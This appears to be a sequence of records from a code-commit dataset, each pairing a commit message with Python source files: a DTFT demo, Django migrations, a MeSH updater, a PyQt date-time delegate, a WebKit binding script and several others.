display_string.append('')
#Create table header
display_string.append('')
header ='Date\t\tTime\t\t'
header_names = ''
for key, value in sorted(sensors.items(), key=lambda e: e[1][0]):
header_names = header_names + key +'\t'
header = header + header_names + 'TS Send'
display_string.append(header)
display_string.append('=' * (len(header) + 5 * header.count('\t')))
#Find the total number of rows on screen
rows, columns = os.popen('stty size', 'r').read().split()
#Draw screen
print('\n'.join(display_string))
#Return number of rows left for data
return(int(rows) - len(display_string))
| Python | 0.000003 | |
754dc2a5bc26a555576970a494a9de0e5026fae1 | Add DTFT demo | dtft.py | dtft.py | #!/usr/bin/env python3
"""
Using a typical FFT routine and showing the principle
behind the DTFT computation.
"""
import numpy as np
from matplotlib import pyplot
##################################################
# Efficient practical usage
def fft(values, dt):
freqs = np.fft.rfftfreq(len(values), dt)
coeffs = np.sqrt(2/len(values)) * np.fft.rfft(values) # scaled for unitarity
coeffs[0] /= np.sqrt(2) # don't "double count" the DC alias
return (freqs, coeffs)
# Working principle
def dtft(values, dt):
times = dt * np.arange(len(values))
nyquist = 1/(2*dt)
dw = 1/(dt*len(values))
freqs = np.arange(0.0, nyquist+dw, dw)
# (rad/s)/Hz all w*t products
dtft_matrix = np.exp(-1j * (2*np.pi) * np.outer(freqs, times))
coeffs = np.sqrt(2/len(values)) * dtft_matrix.dot(values) # scaled for unitarity
coeffs[0] /= np.sqrt(2) # don't "double count" the DC alias
return (freqs, coeffs)
##################################################
def function(time):
w = 20*np.pi
value = 0.0
for k in range(5):
value += (k+1)*np.cos((k*w)*time)
return value
dt = 0.001
times = np.arange(0.0, 0.2, dt)
values = function(times)
##################################################
fft_freqs, fft_coeffs = fft(values, dt)
dtft_freqs, dtft_coeffs = dtft(values, dt)
assert np.allclose(fft_freqs, dtft_freqs)
assert np.allclose(fft_coeffs, dtft_coeffs)
##################################################
# Demonstrate Parseval's theorem
print(np.linalg.norm(values))
print(np.linalg.norm(dtft_coeffs))
##################################################
fig = pyplot.figure()
ax = fig.add_subplot(2, 1, 1)
ax.plot(times, values)
ax.set_xlabel("Time (s)", fontsize=16)
ax.grid(True)
ax = fig.add_subplot(2, 1, 2)
ax.scatter(dtft_freqs, np.abs(dtft_coeffs))
ax.set_xlabel("Freq (Hz)", fontsize=16)
ax.grid(True)
pyplot.show()
| Python | 0 | |
f342a3bb330eab74f31f632c81792f93a6e086e8 | Add a script to automate the generation of source distributions for Windows and Linux. | create_distributions.py | create_distributions.py | """Script to automate the creation of Windows and Linux source distributions.
The TOPKAPI_example directory is also copied and the .svn directories stripped
to make a clean distribution. The manual is included in MSWord format for now
because this is how it's stored in SVN.
This script currently relies on Linux tools and will only work on a Linux
system for now.
"""
import os
import shutil
command = 'find . -name .svn -type d -print0 | xargs -0 rm -rf'
def make_distro(dist_path, ex_path, files):
path = os.path.join(dist_path, ex_path)
if os.path.isdir(dist_path):
for root, dirs, files in os.walk(dist_path, topdown=False):
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
os.rmdir(os.path.join(root, name))
shutil.copytree(ex_path, path)
curr_dir = os.getcwd()
os.chdir(path)
os.system(command)
os.chdir(curr_dir)
for fname in files:
shutil.copy(fname, dist_path)
if __name__ == "__main__":
# make sure the source distributions are built
os.system('python setup.py sdist --formats=gztar,zip')
# make Linux distribution
dist_path = 'TOPKAPI_linux'
ex_path = 'TOPKAPI_Example'
linux_files = ['dist/TOPKAPI-0.1.tar.gz', 'TOPKAPI_Manual.doc']
make_distro(dist_path, ex_path, linux_files)
# make Windows distribution
dist_path = 'TOPKAPI_windows'
ex_path = 'TOPKAPI_Example'
windows_files = ['dist/TOPKAPI-0.1.zip', 'TOPKAPI_Manual.doc']
make_distro(dist_path, ex_path, windows_files)
| Python | 0 | |
6fd4aefcc70e28d96d7110a903328f24b6fea5e4 | bring back the in RAM version, it uses less RAM, but too much to pass 10M entries I think | zorin/mreport.py | zorin/mreport.py | import sys
import json
class Site(object):
def __init__(self):
self.op_events = {}
self.chats = set()
self.emails = set()
self.operators = set()
self.visitors = set()
def add_operator_event(self, ts, op, state):
self.op_events[op] = sorted(set(self.op_events.get(op, []) + [(ts, state)]))
self.operators.add(op)
def get_state(self, time_stamp):
states = []
for op, events in self.op_events.items():
prev_state = False
for ts, state in events:
if ts > time_stamp:
break
prev_state = state
states.append(prev_state)
return True if True in states else False
def add_chat(self, time_stamp, visitor):
if time_stamp in self.chats or time_stamp in self.emails:
return
state = self.get_state(time_stamp)
if state:
self.chats.add(time_stamp)
else:
self.emails.add(time_stamp)
self.visitors.add(visitor)
def report(self, site_id):
print "{site_id},messages={messages},emails={emails},operators={operators},visitors={visitors}".format(
site_id=site_id, messages=len(self.chats), emails=len(self.emails),
operators=len(self.operators), visitors=len(self.visitors))
def main():
fname = sys.argv[1]
iterations = []
for iter in range(0,15):
sites = {}
iterations.append(sites)
with open(fname) as f:
for line in f.readlines():
data = json.loads(line)
site_id = data['site_id']
site = sites.setdefault(site_id, Site())
if data['type'] == 'status':
status = True if data['data']['status'] == 'online' else False
site.add_operator_event(int(data['timestamp']), intern(str(data['from'])), status)
with open(fname) as f:
for line in f.readlines():
data = json.loads(line.strip())
site_id = data['site_id']
site = sites[site_id]
if data['type'] == 'message':
site.add_chat(int(data['timestamp']), intern(str(data['from'])))
# for site_id, site in sorted(sites.items(), key=lambda _e: _e[0]):
# site.report(site_id)
raw_input("Press Enter to continue...")
print iterations
if __name__ == '__main__':
main()
| Python | 0 | |
a038d9e204bd54e69d5a84427bc9a56b04583460 | Create restart script | dbaas/maintenance/scripts/restart_database.py | dbaas/maintenance/scripts/restart_database.py | from datetime import date, timedelta
from maintenance.models import TaskSchedule
from logical.models import Database
def register_schedule_task_restart_database(hostnames):
today = date.today()
try:
databases = Database.objects.filter(
databaseinfra__instances__hostname__hostname__in=hostnames
).distinct()
for database in databases:
print("Checking database {}".format(database.name))
scheudled_tasks = TaskSchedule.objects.filter(
status=TaskSchedule.SCHEDULED,
database=database,
method_path='restart_database'
)
if scheudled_tasks:
print("Already scheduled for database {}!".format(
database.name)
)
else:
task = TaskSchedule.objects.create(
method_path='restart_database',
scheduled_for=TaskSchedule.next_maintenance_window(
today + timedelta(days=2),
database.databaseinfra.maintenance_window,
database.databaseinfra.maintenance_day
),
database=database
)
task.send_mail(is_new=True)
print("Done")
except Exception as err:
print("Error: {}".format(err))
| Python | 0.000001 | |
93a396fdfc2b4a9f83ffbeb38c6f5a574f61478e | Add initial MeSH update script | scripts/update_mesh.py | scripts/update_mesh.py | import os
import re
import csv
import gzip
import xml.etree.ElementTree as ET
from urllib.request import urlretrieve
def _get_term_names(record, name):
# We then need to look for additional terms related to the
# preferred concept to get additional names
concepts = record.findall('ConceptList/Concept')
all_term_names = []
for concept in concepts:
# We only look at the preferred concept here
if concept.attrib['PreferredConceptYN'] == 'Y':
terms = concept.findall('TermList/Term')
for term in terms:
term_name = term.find('String').text
if term_name != name:
all_term_names.append(term_name)
return all_term_names
def get_mesh_names(et):
names = {}
for record in et.iterfind('DescriptorRecord'):
# We first get the ID and the name
uid = record.find('DescriptorUI').text
tree_numbers = record.findall('TreeNumberList/TreeNumber')
# Diseases are in the C subtree
if not any(t.text[0] == 'C' for t in tree_numbers):
continue
name = record.find('DescriptorName/String').text
synonyms = _get_term_names(record, name)
names[uid] = [name] + synonyms
return names
def entries_from_names(names):
entries = []
for uid, synonyms in names.items():
for synonym in synonyms:
entries.append((synonym, uid))
print('Got a total of %d entries' % len(entries))
return entries
def load_mesh_resource_file():
url = 'ftp://nlmpubs.nlm.nih.gov/online/mesh/2019/xmlmesh/desc2019.gz'
desc_path = os.path.join(here, 'mesh_desc2019.gz')
if not os.path.exists(desc_path):
print('Download MeSH descriptors from %s' % url)
urlretrieve(url, desc_path)
print('Done downloading MeSH descriptors')
# Process the XML and find descriptor records
with gzip.open(desc_path) as desc_file:
print('Parsing MeSH descriptors')
et = ET.parse(desc_file)
return et
if __name__ == '__main__':
# Basic positioning
here = os.path.dirname(os.path.abspath(__file__))
kb_dir = os.path.join(here, os.pardir, 'src', 'main', 'resources', 'org',
'clulab', 'reach', 'kb')
resource_fname = os.path.join(kb_dir, 'mesh_disease.tsv')
et = load_mesh_resource_file()
mesh_names = get_mesh_names(et)
# We sort the entries first by the synonym but in a way that special
# characters and capitalization are ignored, then sort by ID
entries = entries_from_names(mesh_names)
entries = sorted(entries, key=(lambda x:
(re.sub('[^A-Za-z0-9]', '', x[0]).lower(),
x[1])))
# Now dump the entries into an updated TSV file
with open(resource_fname, 'w') as fh:
writer = csv.writer(fh, delimiter='\t')
for entry in entries:
writer.writerow(entry)
with open(resource_fname, 'rb') as f1, \
gzip.open(resource_fname + '.gz', 'wb') as f2:
f2.writelines(f1)
| Python | 0 | |
b28feb542a34cec9ae9d21b1efed5676dcab8956 | Make ContestParticipation.user not nullable; #428 | judge/migrations/0030_remove_contest_profile.py | judge/migrations/0030_remove_contest_profile.py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-07-31 18:13
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
def move_current_contest_to_profile(apps, schema_editor):
ContestProfile = apps.get_model('judge', 'ContestProfile')
db_alias = schema_editor.connection.alias
for cp in ContestProfile.objects.using(db_alias).exclude(current=None).select_related('user'):
cp.user.current_contest_id = cp.current_id
cp.user.save()
def move_current_contest_to_contest_profile(apps, schema_editor):
ContestProfile = apps.get_model('judge', 'ContestProfile')
Profile = apps.get_model('judge', 'Profile')
db_alias = schema_editor.connection.alias
for profile in Profile.objects.using(db_alias).exclude(current_contest=None):
cp = ContestProfile.objects.get_or_create(user=profile)[0]
cp.current_id = profile.current_contest_id
cp.save()
def contest_participation_to_profile(apps, schema_editor):
ContestParticipation = apps.get_model('judge', 'ContestParticipation')
db_alias = schema_editor.connection.alias
for cp in ContestParticipation.objects.using(db_alias).select_related('profile'):
cp.user_id = cp.profile.user_id
cp.save()
def contest_participation_to_contest_profile(apps, schema_editor):
ContestParticipation = apps.get_model('judge', 'ContestParticipation')
ContestProfile = apps.get_model('judge', 'ContestProfile')
db_alias = schema_editor.connection.alias
for cp in ContestParticipation.objects.using(db_alias).select_related('profile'):
cp.profile = ContestProfile.objects.get_or_create(user_id=cp.user_id)[0]
cp.save()
class Migration(migrations.Migration):
dependencies = [
('judge', '0029_problem_translation'),
]
operations = [
migrations.AddField(
model_name='profile',
name='current_contest',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL,
related_name='+', to='judge.ContestParticipation',
verbose_name='Current contest'),
),
migrations.RunPython(move_current_contest_to_profile, move_current_contest_to_contest_profile),
migrations.AddField(
model_name='contestparticipation',
name='user',
field=models.ForeignKey(null=True, db_index=True, on_delete=django.db.models.deletion.CASCADE,
related_name='contest_history', to='judge.Profile', verbose_name='user'),
preserve_default=False,
),
migrations.AlterField(
model_name='contestparticipation',
name='profile',
field=models.ForeignKey(to='judge.ContestProfile', verbose_name='User', related_name='contest_history',
null=True, on_delete=django.db.models.deletion.CASCADE),
),
migrations.RunPython(contest_participation_to_profile, contest_participation_to_contest_profile),
migrations.AlterField(
model_name='contestparticipation',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='contest_history',
to='judge.Profile', verbose_name='user'),
),
migrations.RemoveField(
model_name='contestparticipation',
name='profile',
),
migrations.DeleteModel(name='contestprofile'),
]
| # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-07-31 18:13
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
def move_current_contest_to_profile(apps, schema_editor):
ContestProfile = apps.get_model('judge', 'ContestProfile')
db_alias = schema_editor.connection.alias
for cp in ContestProfile.objects.using(db_alias).exclude(current=None).select_related('user'):
cp.user.current_contest_id = cp.current_id
cp.user.save()
def move_current_contest_to_contest_profile(apps, schema_editor):
ContestProfile = apps.get_model('judge', 'ContestProfile')
Profile = apps.get_model('judge', 'Profile')
db_alias = schema_editor.connection.alias
for profile in Profile.objects.using(db_alias).exclude(current_contest=None):
cp = ContestProfile.objects.get_or_create(user=profile)[0]
cp.current_id = profile.current_contest_id
cp.save()
def contest_participation_to_profile(apps, schema_editor):
ContestParticipation = apps.get_model('judge', 'ContestParticipation')
db_alias = schema_editor.connection.alias
for cp in ContestParticipation.objects.using(db_alias).select_related('profile'):
cp.user_id = cp.profile.user_id
cp.save()
def contest_participation_to_contest_profile(apps, schema_editor):
ContestParticipation = apps.get_model('judge', 'ContestParticipation')
ContestProfile = apps.get_model('judge', 'ContestProfile')
db_alias = schema_editor.connection.alias
for cp in ContestParticipation.objects.using(db_alias).select_related('profile'):
cp.profile = ContestProfile.objects.get_or_create(user_id=cp.user_id)[0]
cp.save()
class Migration(migrations.Migration):
dependencies = [
('judge', '0029_problem_translation'),
]
operations = [
migrations.AddField(
model_name='profile',
name='current_contest',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='judge.ContestParticipation', verbose_name='Current contest'),
),
migrations.RunPython(move_current_contest_to_profile, move_current_contest_to_contest_profile),
migrations.AddField(
model_name='contestparticipation',
name='user',
field=models.ForeignKey(null=True, db_index=True, on_delete=django.db.models.deletion.CASCADE, related_name='contest_history', to='judge.Profile', verbose_name='user'),
preserve_default=False,
),
migrations.AlterField(
model_name='contestparticipation',
name='profile',
field=models.ForeignKey(to='judge.ContestProfile', verbose_name='User', related_name='contest_history', null=True, on_delete=django.db.models.deletion.CASCADE),
),
migrations.RunPython(contest_participation_to_profile, contest_participation_to_contest_profile),
migrations.RemoveField(
model_name='contestparticipation',
name='profile',
),
migrations.DeleteModel(name='contestprofile'),
]
| Python | 0.000103 |
6ea2d5af752e4765be8ef433139f72538fa3a2dd | Check that relationships in SsWang are up-to-date | tests/test_semsim_wang_termwise.py | tests/test_semsim_wang_termwise.py | #!/usr/bin/env python3
"""Test S-value for Table 1 in Wang_2007"""
__copyright__ = "Copyright (C) 2020-present, DV Klopfenstein. All rights reserved."
__author__ = "DV Klopfenstein"
from os.path import join
from sys import stdout
from goatools.base import get_godag
from goatools.semsim.termwise.wang import SsWang
from goatools.godag.consts import RELATIONSHIP_SET
from tests.utils import REPO
from tests.data.ssWang.tbl1 import GO2SVALUE
def test_semsim_wang(prt=stdout):
"""Wang Semantic Similarity tests"""
fin_godag = join(REPO, 'go-basic.obo')
run = Run(fin_godag, prt)
run.chk_relationships()
class Run:
"""Wang Semantic Similarity tests"""
def __init__(self, fin_godag, prt):
self.godag = get_godag(fin_godag, optional_attrs=['relationship'], prt=prt)
@staticmethod
def _chk_svalues_a(dag_a):
"""Check values against Table 1"""
assert len(dag_a.go2svalue) == len(GO2SVALUE)
for goid, svalue_act in dag_a.go2svalue.items():
svalue_exp = GO2SVALUE[goid]
assert abs(svalue_exp - svalue_act) < .001, 'MISMATCH EXP({}) != ACT({})'.format(
svalue_exp, svalue_act)
def chk_relationships(self):
"""Check that actual relationships are expected"""
rels_all = set()
for goterm in self.godag.values():
rels_cur = goterm.relationship.keys()
if rels_cur:
rels_all.update(rels_cur)
assert rels_all == RELATIONSHIP_SET, 'UNEXPECTED RELATIONSHIPS'
print('**PASSED: EXPECTED GODag RELATIONSHIPS: {R}'.format(R=sorted(rels_all)))
rels_all.add('is_a')
rels_act = set(SsWang.dflt_rel2scf.keys())
assert rels_all == rels_act, 'BAD SsWang RELATIONSHIPS: {Rs}'.format(Rs=rels_act)
print('**PASSED: EXPECTED SsWang RELATIONSHIPS: {R}'.format(R=sorted(rels_act)))
if __name__ == '__main__':
test_semsim_wang()
# Copyright (C) 2020-present DV Klopfenstein. All rights reserved.
| Python | 0 | |
43eb87c1297ac9999f027f275bce94b3e8f4894e | add problem | leetcode/14_longest_common_prefix.py | leetcode/14_longest_common_prefix.py | """
Write a function to find the longest common prefix string amongst an array of strings.
If there is no common prefix, return an empty string "".
Example 1:
Input: ["flower","flow","flight"]
Output: "fl"
Example 2:
Input: ["dog","racecar","car"]
Output: ""
Explanation: There is no common prefix among the input strings.
Note:
All given inputs are in lowercase letters a-z.
"""
class Solution:
def longestCommonPrefix(self, strs: List[str]) -> str:
| Python | 0.044376 | |
6e1e4478593c73aeef81a5dbcea62f4de8de7fb0 | Add that migration | accounts/migrations/0002_auto__del_profile.py | accounts/migrations/0002_auto__del_profile.py | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting model 'Profile'
db.delete_table(u'accounts_profile')
def backwards(self, orm):
# Adding model 'Profile'
db.create_table(u'accounts_profile', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('user', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['accounts.User'], unique=True)),
))
db.send_create_signal(u'accounts', ['Profile'])
models = {
u'accounts.authtoken': {
'Meta': {'object_name': 'AuthToken'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounts.User']"})
},
u'accounts.user': {
'Meta': {'object_name': 'User'},
'avatar': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'steamid': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['accounts'] | Python | 0.000214 | |
347f22593a20c5553b9469fad051dbaa34643082 | add test_log_likelihood.py | crosscat/tests/test_log_likelihood.py | crosscat/tests/test_log_likelihood.py | import argparse
from functools import partial
#
import pylab
pylab.ion()
pylab.show()
#
from crosscat.LocalEngine import LocalEngine
import crosscat.utils.data_utils as du
import crosscat.utils.timing_test_utils as ttu
import crosscat.utils.convergence_test_utils as ctu
parser = argparse.ArgumentParser()
parser.add_argument('--gen_seed', default=0, type=int)
parser.add_argument('--num_rows', default=100, type=int)
parser.add_argument('--num_cols', default=4, type=int)
parser.add_argument('--num_clusters', default=5, type=int)
parser.add_argument('--num_views', default=1, type=int)
parser.add_argument('--n_steps', default=10, type=int)
args = parser.parse_args()
#
gen_seed = args.gen_seed
num_rows = args.num_rows
num_cols = args.num_cols
num_clusters = args.num_clusters
num_views = args.num_views
n_steps = args.n_steps
#
n_test = num_rows / 10
# generate data
T, M_c, M_r, gen_X_L, gen_X_D = ttu.generate_clean_state(gen_seed, num_clusters,
num_cols, num_rows, num_views)
T_test = ctu.create_test_set(M_c, T, gen_X_L, gen_X_D, n_test, seed_seed=0)
engine = LocalEngine()
X_L, X_D = engine.initialize(M_c, M_r, T)
gen_mtll = ctu.calc_mean_test_log_likelihood(M_c, T, gen_X_L, gen_X_D, T_test)
gen_preplexity = ctu.calc_mean_test_log_likelihood(M_c, T, gen_X_L, gen_X_D, T)
# run inference
calc_perplexity = lambda p_State: \
ctu.calc_mean_test_log_likelihood(M_c, T, p_State.get_X_L(),
p_State.get_X_D(), T)
calc_test_log_likelihood = lambda p_State: \
ctu.calc_mean_test_log_likelihood(M_c, T, p_State.get_X_L(),
p_State.get_X_D(), T_test)
diagnostic_func_dict = dict(
perplexity=calc_perplexity,
test_log_likelihood=calc_test_log_likelihood,
)
X_L, X_D, diagnostics_dict = engine.analyze(M_c, T, X_L, X_D,
do_diagnostics=diagnostic_func_dict, n_steps=n_steps)
# plot
pylab.plot(diagnostics_dict['test_log_likelihood'], 'g')
pylab.plot(diagnostics_dict['perplexity'], 'r')
pylab.axhline(gen_mtll, color='k')
pylab.axhline(gen_preplexity, color='b')
| Python | 0.000003 | |
613917df190a72de63238149a2128affe94f9f39 | Add a snippet. | python/pyqt/pyqt5/widget_QTableView_delegate_on_edit_using_datetimeedit_that_can_be_set_to_none.py | python/pyqt/pyqt5/widget_QTableView_delegate_on_edit_using_datetimeedit_that_can_be_set_to_none.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Ref:
# - http://doc.qt.io/qt-5/modelview.html#3-4-delegates
# - http://doc.qt.io/qt-5/model-view-programming.html#delegate-classes
# - http://doc.qt.io/qt-5/qabstractitemdelegate.html#details
# - http://doc.qt.io/qt-5/qitemdelegate.html#details
# - http://doc.qt.io/qt-5/qstyleditemdelegate.html#details
# - http://doc.qt.io/qt-5/qtwidgets-itemviews-spinboxdelegate-example.html
import sys
import datetime
from PyQt5.QtCore import Qt, QAbstractTableModel, QVariant
from PyQt5.QtWidgets import QApplication, QTableView, QStyledItemDelegate, QAction, QDateTimeEdit
DATETIME_FORMAT = '%Y-%m-%d %H:%M'
###############################################################################
class MyModel(QAbstractTableModel):
def __init__(self, parent=None):
super().__init__(parent)
self._data = [datetime.datetime.now() for j in range(3)] # DON'T CALL THIS ATTRIBUTE "data", A METHOD ALREADY HAVE THIS NAME (model.data(index, role)) !!!
self._data[0] = None
def rowCount(self, parent):
return len(self._data)
def columnCount(self, parent):
return 1
def data(self, index, role):
if role == Qt.DisplayRole:
value = self._data[index.row()]
if value is None:
value_str = "none"
else:
value_str = datetime.datetime.strftime(value, DATETIME_FORMAT)
return value_str
elif role == Qt.EditRole:
value = self._data[index.row()]
return value
return QVariant()
def setData(self, index, value, role):
if role == Qt.EditRole:
try:
self._data[index.row()] = value # value is supposed to be a datatime object
print(value)
# The following line are necessary e.g. to dynamically update the QSortFilterProxyModel
self.dataChanged.emit(index, index, [Qt.EditRole])
except Exception as e:
print(e)
return False
return True
def flags(self, index):
return Qt.ItemIsSelectable | Qt.ItemIsEditable | Qt.ItemIsEnabled
###############################################################################
class MyDelegate(QStyledItemDelegate):
def deleteActionCallback(self, editor, index):
index.model().setData(index, None, Qt.EditRole)
self.closeEditor.emit(editor)
def createEditor(self, parent, option, index):
"""
Crée le widget utilisé pour éditer la valeur d'une cellule
Retourne un widget "vierge", i.e. ce n'est pas ici qu'on initialise la valeur du widget.
En revanche, c'est ici qu'on peut définir les valeurs min/max acceptées, etc.
https://doc.qt.io/qt-5/model-view-programming.html#providing-an-editor
"""
editor = QDateTimeEdit(parent=parent)
editor.setMinimumDate(datetime.datetime(year=2017, month=9, day=1, hour=8, minute=30))
editor.setMaximumDate(datetime.datetime(year=2030, month=9, day=1, hour=18, minute=30))
editor.setDisplayFormat("yyyy-MM-dd HH:mm")
#editor.setCalendarPopup(True)
# setFrame(): tell whether the line edit draws itself with a frame.
# If enabled (the default) the line edit draws itself inside a frame, otherwise the line edit draws itself without any frame.
editor.setFrame(False)
action = QAction(editor) # <-
action.setShortcut(Qt.CTRL | Qt.Key_Delete) # <-
#action.setShortcut(Qt.Key_Delete) # the keyevent for the suppr key is already catched by the editor thus it doesn't work...
action.triggered.connect(lambda : self.deleteActionCallback(editor, index)) # <-
editor.addAction(action) # <-
return editor
def setEditorData(self, editor, index):
"""
Initialise la valeur du widget utilisé pour éditer la valeur d'une cellule.
La donnée du modèle peut être récupérée via l'argument "index" (index.data(), index.model(), ...).
Cette méthode:
1. récupère la donnée du **modèle** (index.data(), ...)
2. appèle la méthode approprée pour initialiser le widget editor (e.g. editor.setValue(value) si c'est un QSpinBox, ...)
Mémo: model.data() -> editor.setValue()
"""
value = index.data(Qt.EditRole) # equivalent of value = index.model().data(index, Qt.EditRole)
if value is None:
value = datetime.datetime.now()
editor.setDateTime(value) # value cannot be a string, it have to be a datetime...
def setModelData(self, editor, model, index):
"""
Submit editor's (widget) data to the *model*
When the user has finished editing the value in the spin box,
the view asks the delegate to store the edited value in the model by calling the setModelData() function.
Cette méthode:
1. récupère la donnée du **widget editor** avec la méthode appropriée (e.g. editor.value() si editor est un QSpinBox...)
2. écrit la valeur dans le modèle au bon l'index: model.setData(...)
https://doc.qt.io/qt-5/model-view-programming.html#submitting-data-to-the-model
Mémo: editor.value() -> model.setDdata()
"""
editor.interpretText()
dt_value = editor.dateTime().toPyDateTime() # dt_value = editor.dateTime().toPyDateTime()
dt_value = dt_value.replace(second=0, microsecond=0) # https://docs.python.org/3.5/library/datetime.html#datetime.datetime.replace
model.setData(index, dt_value, Qt.EditRole)
def updateEditorGeometry(self, editor, option, index):
"""
It is the responsibility of the delegate to manage the editor's geometry.
The geometry must be set when the editor is created, and when the item's size or position in the view is changed.
Fortunately, the view provides all the necessary geometry information inside a view option object.
In this case, we just use the geometry information provided by the view option in the item rectangle.
A delegate that renders items with several elements would not use the item rectangle directly.
It would position the editor in relation to the other elements in the item.
https://doc.qt.io/qt-5/model-view-programming.html#updating-the-editor-s-geometry
"""
editor.setGeometry(option.rect)
if __name__ == '__main__':
app = QApplication(sys.argv)
table_view = QTableView()
my_model = MyModel()
table_view.setModel(my_model)
delegate = MyDelegate()
table_view.setItemDelegate(delegate)
table_view.show()
# The mainloop of the application. The event handling starts from this point.
# The exec_() method has an underscore. It is because the exec is a Python keyword. And thus, exec_() was used instead.
exit_code = app.exec_()
# The sys.exit() method ensures a clean exit.
# The environment will be informed, how the application ended.
sys.exit(exit_code)
| Python | 0.000002 | |
3acbccb289ff74d063c4809d8fc20235e99ea314 | When an assert fails, print the data that failed the assert so the problem can be triaged. BUG=none TEST=none Review URL: http://codereview.chromium.org/285005 | webkit/build/rule_binding.py | webkit/build/rule_binding.py | #!/usr/bin/python
# Copyright (c) 2009 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# usage: rule_binding.py INPUT CPPDIR HDIR -- INPUTS -- OPTIONS
#
# INPUT is an IDL file, such as Whatever.idl.
#
# CPPDIR is the directory into which V8Whatever.cpp will be placed. HDIR is
# the directory into which V8Whatever.h will be placed.
#
# The first item in INPUTS is the path to generate-bindings.pl. Remaining
# items in INPUTS are used to build the Perl module include path.
#
# OPTIONS are passed as-is to generate-bindings.pl as additional arguments.
import errno
import os
import shlex
import shutil
import subprocess
import sys
def SplitArgsIntoSections(args):
sections = []
while len(args) > 0:
if not '--' in args:
# If there is no '--' left, everything remaining is an entire section.
dashes = len(args)
else:
dashes = args.index('--')
sections.append(args[:dashes])
# Next time through the loop, look at everything after this '--'.
if dashes + 1 == len(args):
# If the '--' is at the end of the list, we won't come back through the
# loop again. Add an empty section now corresponding to the nothingness
# following the final '--'.
args = []
sections.append(args)
else:
args = args[dashes + 1:]
return sections
def main(args):
sections = SplitArgsIntoSections(args[1:])
assert len(sections) == 3, sections
(base, inputs, options) = sections
assert len(base) == 3, base
(input, cppdir, hdir) = base
assert len(inputs) > 1, inputs
generate_bindings = inputs[0]
perl_modules = inputs[1:]
include_dirs = []
for perl_module in perl_modules:
include_dir = os.path.dirname(perl_module)
if not include_dir in include_dirs:
include_dirs.append(include_dir)
# The defines come in as one flat string. Split it up into distinct arguments.
if '--defines' in options:
defines_index = options.index('--defines')
if defines_index + 1 < len(options):
split_options = shlex.split(options[defines_index + 1])
if split_options:
options[defines_index + 1] = ' '.join(split_options)
# Build up the command.
command = ['perl', '-w']
for include_dir in include_dirs:
command.extend(['-I', include_dir])
command.append(generate_bindings)
command.extend(options)
command.extend(['--outputDir', cppdir, input])
# Do it. check_call is new in 2.5, so simulate its behavior with call and
# assert.
return_code = subprocess.call(command)
